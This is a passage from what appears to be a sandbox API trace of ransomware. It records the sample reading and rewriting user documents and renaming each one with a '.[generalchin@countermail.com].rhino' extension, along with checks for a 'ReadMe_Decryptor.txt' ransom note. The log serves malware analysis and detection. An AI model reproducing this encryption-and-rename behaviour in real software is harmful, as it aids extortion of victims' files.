lpBuffer=0x2b80040, nNumberOfBytesToRead=0x8f12, lpNumberOfBytesRead=0x292f304, lpOverlapped=0x0 | out: lpBuffer=0x2b80040*, lpNumberOfBytesRead=0x292f304*=0x8f12, lpOverlapped=0x0) returned 1 [0106.662] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x4) returned 0x72baf8 [0106.662] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72baf8 | out: hHeap=0x6d0000) returned 1 [0106.662] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2c) returned 0x711b50 [0106.662] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x40) returned 0x23b09f0 [0106.662] GetLastError () returned 0x0 [0106.662] SetLastError (dwErrCode=0x0) [0106.662] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x711b50 | out: hHeap=0x6d0000) returned 1 [0106.662] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x8f35) returned 0x23b2088 [0106.662] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b09f0 | out: hHeap=0x6d0000) returned 1 [0106.662] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x100) returned 0x6f0648 [0106.662] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x180) returned 0x71b1c8 [0106.662] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f0648 | out: hHeap=0x6d0000) returned 1 [0106.662] SetFilePointerEx (in: hFile=0x110, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0106.663] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1) returned 0x72baf8 [0106.663] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2) returned 0x72bb08 [0106.663] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72baf8 | out: hHeap=0x6d0000) returned 1 [0106.663] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x3) returned 0x72baf8 [0106.663] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72bb08 | out: hHeap=0x6d0000) returned 1 [0106.663] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x4) returned 0x72bb08 [0106.663] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72baf8 | out: hHeap=0x6d0000) returned 1 [0106.663] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x6) returned 0x72baf8 [0106.663] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72bb08 | out: hHeap=0x6d0000) returned 1 [0106.663] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x9) returned 0x757dd8 [0106.663] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72baf8 | out: hHeap=0x6d0000) returned 1 [0106.663] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xd) returned 0x757df0 [0106.663] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x757dd8 | out: hHeap=0x6d0000) returned 1 [0106.663] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x13) returned 0x23bafe0 [0106.663] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x757df0 | out: hHeap=0x6d0000) returned 1 [0106.663] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1c) returned 0x711898 [0106.663] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23bafe0 | out: hHeap=0x6d0000) returned 1 [0106.663] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2a) returned 0x711b50 [0106.663] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x711898 | out: hHeap=0x6d0000) returned 1 [0106.663] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x3f) returned 0x23b09f0 [0106.664] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x711b50 | out: hHeap=0x6d0000) returned 1 [0106.664] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x5e) returned 0x6ef8b0 [0106.664] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b09f0 | out: hHeap=0x6d0000) returned 1 [0106.664] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x8d) returned 0x23bb7c8 [0106.664] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6ef8b0 | out: hHeap=0x6d0000) returned 1 [0106.664] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xd3) returned 0x23bb860 [0106.664] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23bb7c8 | out: hHeap=0x6d0000) returned 1 [0106.664] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x13c) returned 0x23bb940 [0106.664] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23bb860 | out: hHeap=0x6d0000) returned 1 [0106.664] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1da) returned 0x712f08 [0106.664] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23bb940 | out: hHeap=0x6d0000) returned 1 [0106.664] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2c7) returned 0x23bb7c8 [0106.664] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x712f08 | out: hHeap=0x6d0000) returned 1 [0106.664] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x42a) returned 0x712f08 [0106.664] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23bb7c8 | out: hHeap=0x6d0000) returned 1 [0106.664] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x63f) returned 0x713340 [0106.664] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x712f08 | out: hHeap=0x6d0000) returned 1 [0106.664] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x95e) returned 0x713988 [0106.664] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x713340 | out: hHeap=0x6d0000) returned 1 [0106.665] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xe0d) returned 0x7142f0 [0106.665] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x713988 | out: hHeap=0x6d0000) returned 1 [0106.665] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1536) returned 0x715108 [0106.665] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x7142f0 | out: hHeap=0x6d0000) returned 1 [0106.665] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1fbf) returned 0x712f08 [0106.665] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x715108 | out: hHeap=0x6d0000) returned 1 [0106.665] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2f8d) returned 0x714ed0 [0106.665] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x712f08 | out: hHeap=0x6d0000) returned 1 [0106.665] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x4742) returned 0x23d16b8 [0106.666] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x714ed0 | out: hHeap=0x6d0000) returned 1 [0106.667] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x6ad1) returned 0x712f08 [0106.667] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23d16b8 | out: hHeap=0x6d0000) returned 1 [0106.667] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa028) returned 0x23d16b8 [0106.667] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x712f08 | out: hHeap=0x6d0000) returned 1 [0106.669] WriteFile (in: hFile=0x110, lpBuffer=0x23d16c0*, nNumberOfBytesToWrite=0x9032, lpNumberOfBytesWritten=0x292f304, lpOverlapped=0x0 | out: lpBuffer=0x23d16c0*, lpNumberOfBytesWritten=0x292f304*=0x9032, lpOverlapped=0x0) returned 1 [0106.670] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23d16b8 | out: hHeap=0x6d0000) returned 1 [0106.670] UnlockFile (hFile=0x110, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0x9032, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0106.670] CloseHandle (hObject=0x110) returned 1 [0106.672] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa0) returned 0x7a3308 [0106.672] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xf0) returned 0x23bb7c8 [0106.672] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x7a3308 | out: hHeap=0x6d0000) returned 1 [0106.672] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KjWgNXSB5P\\E T-VRRSTs\\PXapwoyUb.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\kjwgnxsb5p\\e t-vrrsts\\pxapwoyub.docx"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KjWgNXSB5P\\E T-VRRSTs\\PXapwoyUb.docx.[generalchin@countermail.com].rhino" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\kjwgnxsb5p\\e t-vrrsts\\pxapwoyub.docx.[generalchin@countermail.com].rhino"), dwFlags=0x2) returned 1 [0106.675] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23bb7c8 | out: hHeap=0x6d0000) returned 1 [0106.675] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x71b1c8 | out: hHeap=0x6d0000) returned 1 [0106.675] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b2088 | out: hHeap=0x6d0000) returned 1 [0106.675] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x80) returned 0x7b07a0 [0106.675] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x7b0718 | out: hHeap=0x6d0000) returned 1 [0106.675] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x80) returned 0x7b0718 [0106.675] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xbe) returned 0x71b1c8 [0106.675] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x7b0718 | out: hHeap=0x6d0000) returned 1 [0106.675] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KjWgNXSB5P\\E T-VRRSTs\\ReadMe_Decryptor.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\kjwgnxsb5p\\e t-vrrsts\\readme_decryptor.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0106.675] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x71b1c8 | out: hHeap=0x6d0000) returned 1 [0106.675] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KjWgNXSB5P\\E T-VRRSTs\\v11WPZ.xls" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\kjwgnxsb5p\\e t-vrrsts\\v11wpz.xls"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x110 [0106.723] GetFileSize (in: hFile=0x110, lpFileSizeHigh=0x292f364 | out: lpFileSizeHigh=0x292f364*=0x0) returned 0x15007 [0106.723] LockFile (hFile=0x110, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0x15127, nNumberOfBytesToLockHigh=0x0) returned 1 [0106.723] SetFilePointerEx (in: hFile=0x110, liDistanceToMove=0xffffffe0, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0106.723] ReadFile (in: hFile=0x110, lpBuffer=0x292f324, nNumberOfBytesToRead=0x20, lpNumberOfBytesRead=0x292f304, lpOverlapped=0x0 | out: lpBuffer=0x292f324*, lpNumberOfBytesRead=0x292f304*=0x20, lpOverlapped=0x0) returned 1 [0106.725] SetFilePointerEx (in: hFile=0x110, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0106.725] ReadFile (in: hFile=0x110, lpBuffer=0x2b80040, nNumberOfBytesToRead=0x15007, lpNumberOfBytesRead=0x292f304, lpOverlapped=0x0 | out: lpBuffer=0x2b80040*, lpNumberOfBytesRead=0x292f304*=0x15007, lpOverlapped=0x0) returned 1 [0106.726] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x4) returned 0x713740 [0106.726] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x713740 | out: hHeap=0x6d0000) returned 1 [0106.726] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2c) returned 0x711c30 [0106.726] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x40) returned 0x23b0ac8 [0106.726] GetLastError () returned 0x0 [0106.726] SetLastError (dwErrCode=0x0) [0106.726] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x711c30 | out: hHeap=0x6d0000) returned 1 [0106.726] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1502a) returned 0x24c0050 [0106.733] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b0ac8 | out: hHeap=0x6d0000) returned 1 [0106.733] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x100) returned 0x6f0648 [0106.733] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x180) returned 0x712898 [0106.733] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f0648 | out: hHeap=0x6d0000) returned 1 [0106.733] SetFilePointerEx (in: hFile=0x110, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0106.733] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1) returned 0x713740 [0106.733] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2) returned 0x713780 [0106.733] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x713740 | out: hHeap=0x6d0000) returned 1 [0106.733] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x3) returned 0x713740 [0106.733] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x713780 | out: hHeap=0x6d0000) returned 1 [0106.733] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x4) returned 0x713780 [0106.733] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x713740 | out: hHeap=0x6d0000) returned 1 [0106.733] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x6) returned 0x713740 [0106.733] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x713780 | out: hHeap=0x6d0000) returned 1 [0106.733] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x9) returned 0x757eb0 [0106.733] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x713740 | out: hHeap=0x6d0000) returned 1 [0106.733] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xd) returned 0x757ec8 [0106.733] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x757eb0 | out: hHeap=0x6d0000) returned 1 [0106.733] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x13) returned 0x713060 [0106.733] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x757ec8 | out: hHeap=0x6d0000) returned 1 [0106.733] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1c) returned 0x23bb080 [0106.734] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x713060 | out: hHeap=0x6d0000) returned 1 [0106.734] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2a) returned 0x711c30 [0106.734] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23bb080 | out: hHeap=0x6d0000) returned 1 [0106.734] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x3f) returned 0x23b0ac8 [0106.734] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x711c30 | out: hHeap=0x6d0000) returned 1 [0106.734] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x5e) returned 0x6ef918 [0106.734] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b0ac8 | out: hHeap=0x6d0000) returned 1 [0106.734] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x8d) returned 0x712a20 [0106.734] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6ef918 | out: hHeap=0x6d0000) returned 1 [0106.734] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xd3) returned 0x714e58 [0106.734] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x712a20 | out: hHeap=0x6d0000) returned 1 [0106.734] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x13c) returned 0x714f38 [0106.734] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x714e58 | out: hHeap=0x6d0000) returned 1 [0106.734] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1da) returned 0x715080 [0106.734] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x714f38 | out: hHeap=0x6d0000) returned 1 [0106.734] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2c7) returned 0x715268 [0106.734] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x715080 | out: hHeap=0x6d0000) returned 1 [0106.734] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x42a) returned 0x715538 [0106.734] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x715268 | out: hHeap=0x6d0000) returned 1 [0106.734] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x63f) returned 0x714e58 [0106.734] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x715538 | out: hHeap=0x6d0000) returned 1 [0106.734] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x95e) returned 0x7154a0 [0106.734] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x714e58 | out: hHeap=0x6d0000) returned 1 [0106.734] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xe0d) returned 0x715e08 [0106.734] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x7154a0 | out: hHeap=0x6d0000) returned 1 [0106.734] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1536) returned 0x716c20 [0106.735] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x715e08 | out: hHeap=0x6d0000) returned 1 [0106.735] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1fbf) returned 0x718160 [0106.735] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x716c20 | out: hHeap=0x6d0000) returned 1 [0106.735] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2f8d) returned 0x714e58 [0106.735] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x718160 | out: hHeap=0x6d0000) returned 1 [0106.735] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x4742) returned 0x23b2088 [0106.735] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x714e58 | out: hHeap=0x6d0000) returned 1 [0106.735] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x6ad1) returned 0x23f16b8 [0106.735] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b2088 | out: hHeap=0x6d0000) returned 1 [0106.735] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa028) returned 0x24d5088 [0106.736] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23f16b8 | out: hHeap=0x6d0000) returned 1 [0106.736] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xf02a) returned 0x23f16b8 [0106.736] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x24d5088 | out: hHeap=0x6d0000) returned 1 [0106.737] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1682d) returned 0x24d5088 [0106.737] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23f16b8 | out: hHeap=0x6d0000) returned 1 [0106.740] WriteFile (in: hFile=0x110, lpBuffer=0x24d50a0*, nNumberOfBytesToWrite=0x15127, lpNumberOfBytesWritten=0x292f304, lpOverlapped=0x0 | out: lpBuffer=0x24d50a0*, lpNumberOfBytesWritten=0x292f304*=0x15127, lpOverlapped=0x0) returned 1 [0106.740] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x24d5088 | out: hHeap=0x6d0000) returned 1 [0106.741] UnlockFile (hFile=0x110, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0x15127, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0106.741] CloseHandle (hObject=0x110) returned 1 [0106.743] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa0) returned 0x7a3308 [0106.743] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xee) returned 0x714e58 [0106.744] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x7a3308 | out: hHeap=0x6d0000) returned 1 [0106.744] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KjWgNXSB5P\\E T-VRRSTs\\v11WPZ.xls" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\kjwgnxsb5p\\e t-vrrsts\\v11wpz.xls"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KjWgNXSB5P\\E T-VRRSTs\\v11WPZ.xls.[generalchin@countermail.com].rhino" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\kjwgnxsb5p\\e t-vrrsts\\v11wpz.xls.[generalchin@countermail.com].rhino"), dwFlags=0x2) returned 1 [0106.748] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x714e58 | out: hHeap=0x6d0000) returned 1 [0106.748] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x712898 | out: hHeap=0x6d0000) returned 1 [0106.748] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x24c0050 | out: hHeap=0x6d0000) returned 1 [0106.749] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x80) returned 0x7b0718 [0106.749] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x7b07a0 | out: hHeap=0x6d0000) returned 1 [0106.749] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x80) returned 0x7b07a0 [0106.749] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xbe) returned 0x712898 [0106.749] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x7b07a0 | out: hHeap=0x6d0000) returned 1 [0106.749] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KjWgNXSB5P\\E T-VRRSTs\\ReadMe_Decryptor.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\kjwgnxsb5p\\e t-vrrsts\\readme_decryptor.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0106.752] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x712898 | out: hHeap=0x6d0000) returned 1 [0106.752] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KjWgNXSB5P\\E T-VRRSTs\\zIJ9l4vUg8q7Ye0AeiB.csv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\kjwgnxsb5p\\e t-vrrsts\\zij9l4vug8q7ye0aeib.csv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x110 [0106.753] GetFileSize (in: hFile=0x110, lpFileSizeHigh=0x292f364 | out: lpFileSizeHigh=0x292f364*=0x0) returned 0x998c [0106.753] LockFile (hFile=0x110, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0x9aac, nNumberOfBytesToLockHigh=0x0) returned 1 [0106.753] SetFilePointerEx (in: hFile=0x110, liDistanceToMove=0xffffffe0, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0106.753] ReadFile (in: hFile=0x110, lpBuffer=0x292f324, nNumberOfBytesToRead=0x20, lpNumberOfBytesRead=0x292f304, lpOverlapped=0x0 | out: lpBuffer=0x292f324*, lpNumberOfBytesRead=0x292f304*=0x20, lpOverlapped=0x0) returned 1 [0106.754] SetFilePointerEx (in: hFile=0x110, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0106.755] ReadFile (in: hFile=0x110, lpBuffer=0x2b80040, nNumberOfBytesToRead=0x998c, lpNumberOfBytesRead=0x292f304, lpOverlapped=0x0 | out: lpBuffer=0x2b80040*, lpNumberOfBytesRead=0x292f304*=0x998c, lpOverlapped=0x0) returned 1 [0106.755] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x4) returned 0x713740 [0106.755] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x713740 | out: hHeap=0x6d0000) returned 1 [0106.755] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2c) returned 0x711c30 [0106.755] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x40) returned 0x23b0ac8 [0106.756] GetLastError () returned 0x0 [0106.756] SetLastError (dwErrCode=0x0) [0106.756] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x711c30 | out: hHeap=0x6d0000) returned 1 [0106.756] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x99af) returned 0x23f16b8 [0106.757] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b0ac8 | out: hHeap=0x6d0000) returned 1 [0106.757] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x100) returned 0x6f0648 [0106.757] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x180) returned 0x712898 [0106.757] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f0648 | out: hHeap=0x6d0000) returned 1 [0106.757] SetFilePointerEx (in: hFile=0x110, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0106.757] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1) returned 0x713740 [0106.758] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2) returned 0x713780 [0106.758] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x713740 | out: hHeap=0x6d0000) returned 1 [0106.758] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x3) returned 0x713740 [0106.758] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x713780 | out: hHeap=0x6d0000) returned 1 [0106.758] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x4) returned 0x713780 [0106.758] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x713740 | out: hHeap=0x6d0000) returned 1 [0106.758] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x6) returned 0x713740 [0106.758] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x713780 | out: hHeap=0x6d0000) returned 1 [0106.758] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x9) returned 0x757ec8 [0106.758] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x713740 